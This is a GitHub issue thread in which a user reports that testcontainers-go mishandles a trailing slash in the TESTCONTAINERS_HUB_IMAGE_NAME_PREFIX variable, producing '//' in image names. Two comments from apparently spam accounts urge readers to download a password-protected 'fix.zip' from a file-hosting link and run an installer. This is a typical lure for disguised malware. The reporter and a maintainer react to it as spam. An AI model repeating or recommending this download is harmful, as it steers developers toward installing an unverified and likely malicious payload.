### ISSUE TITLE
[Bug]: TESTCONTAINERS_HUB_IMAGE_NAME_PREFIX trailing slash not handled properly

### ISSUE THREAD

**Issue by driverpt** [testcontainers/testcontainers-go#2746]
### Testcontainers version

0.33.0

### Using the latest Testcontainers version?

Yes

### Host OS

MacOS

### Host arch

x86

### Go version

1.23

### Docker version

```shell
Docker version 27.1.1, build 6312585
```

### Docker info

```shell
N/A
```

### What happened?

If we add a trailing slash to `TESTCONTAINERS_HUB_IMAGE_NAME_PREFIX`, which we do by convention, Test Containers doesn't handle this very well. All containers end up having something like i.e.:`<custom_url>//<image>` which causes it to fail.

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by driverpt** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

We have Spam bots here in GitHub already ?

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mdelapenya** [comment]
Where does that message come from? 😱
